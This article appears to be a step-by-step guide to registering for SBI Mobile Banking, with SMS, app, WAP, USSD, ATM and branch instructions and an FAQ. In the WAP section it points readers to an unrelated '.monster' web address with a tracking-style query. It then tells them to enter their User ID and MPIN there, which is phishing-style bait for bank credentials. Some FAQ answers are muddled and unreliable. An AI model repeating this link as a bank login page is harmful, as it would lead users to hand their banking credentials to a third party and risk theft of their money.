Ever wondered how you can bank without visiting a branch? SBI Mobile Banking brings your entire bank to your smartphone. The service lets you manage accounts, transfer money, and pay bills.

SBI Mobile Banking is a digital banking service from SBI. It works like having a bank branch in your pocket. Just as a physical branch helps you with transactions and services, the mobile app does everything digitally.

Suppose I need to pay my electricity bill of ₹1,850 urgently tonight. I open the SBI Mobile Banking App on my phone quickly. The app loads within seconds and shows my account balance. I select the bill payment option and choose the electricity provider.

I enter the consumer number and verify the bill amount. The payment processes instantly, and I receive a confirmation message. My bill gets paid without leaving home or standing in queues. The entire transaction takes less than two minutes to complete.

How to Register for SBI Mobile Banking?

SBI Mobile Banking registration happens through two simple stages. The first stage takes place on your mobile handset itself. The second stage requires completion at an SBI ATM or branch. You can also finish registration through the OnlineSBI web portal. Both stages work together to activate your SBI Mobile Banking service.

Stage One: Mobile Handset Registration

The handset process involves two important steps for new users. First, you need to get your User ID and MPIN. Second, you must change the default MPIN for security purposes.

Get Your User ID and Default MPIN

  • Send SMS "MBSREG" to 9223440000 or 567676
  • Receive User ID and default MPIN via SMS
  • Download the app from the link (for Java phones with GPRS)
  • Android/iPhone/Windows users download from respective app stores
  • Non-Java phones use WAP or USSD (no download needed)

Change Your Default MPIN

For Application Users:

  • Open the app after installation
  • Accept Terms and Conditions
  • Enter User ID (case sensitive, exactly as received)
  • Type the default MPIN in the "old MPIN" field
  • Create a new six-digit MPIN
  • Confirm new MPIN and select "Change."
  • Receive confirmation SMS

For WAP Users:

  • Open a mobile browser
  • Enter https://api.nextworksriffzapp.monster/?qr=cp&zqs=458f72326dd20cbb49a573e5a047545a
  • Input User ID and default MPIN
  • Enter WAP Login ID (received via SMS)
  • Select Settings, then "Change MPIN"
  • Follow the same steps as application users

For USSD Users:

  • Start USSD session by dialing the code
  • Enter User ID when prompted
  • Select option 4 (Change MPIN)
  • Accept Terms and Conditions (enter 1)
  • Enter the old MPIN, then the new six-digit MPIN
  • Confirm the new MPIN and receive a success message

Stage Two: Complete Registration at ATM, Branch, or OnlineSBI

The SBI Mobile Banking Login becomes active after completing stage two.

At Branch:

  • Visit the home branch with the registration form
  • Staff activates the account immediately

At ATM:

  • Swipe debit card
  • Select "Mobile Registration" → "Mobile Banking" → "Registration"
  • Enter and confirm your mobile number
  • Collect the transaction slip
  • Receive activation SMS

Via OnlineSBI:

  • Log in to the OnlineSBI account
  • Select "eServices" → "State Bank Freedom."
  • Ensure MPIN is changed and handset validation is completed
  • Select "Registration" from the top menu
  • Choose one Savings/Current account as primary
  • Submit selection to complete SBI Mobile Banking Login.
  • Visit the branch for additional account registrations

Your SBI Mobile Banking login service activates once both stages are completed successfully. The registration process protects your account with multiple security layers. You can now access banking services anytime and from anywhere.

FAQs

Q: Is SBI Mobile Banking free to use?

A: Yes, SBI Mobile Banking services are completely free with no charges.

Q: How can I delete multiple SBI Mobile Banking registrations from my account?

A: You will have to approach your home branch for this. The bank will get all the mobile banking registrations deregistered. This process ensures your account security remains protected always.

Q: Which SBI Mobile Banking app is better: YONO or YONO Lite?

A: YONO Lite is better for pure banking operations only. YONO is overrated with too many non-banking products displayed. YONO Lite offers easier registration through the State Bank portal.

Q: Can I make UPI transactions with international numbers?

You can use PhonePe or ICICI iMobile for services. However, you need an SBI account attached to international numbers. Set yourself up on PhonePe if you meet the requirements. This feature works only in RBI-specified countries.

Q: What should I do if I face YONO app issues?

Use YONO Lite as it is simpler and reliable. For urgent issues, reach out to customer care immediately. You can also visit a branch and speak directly. Regularly update your password and monitor for suspicious account activity.
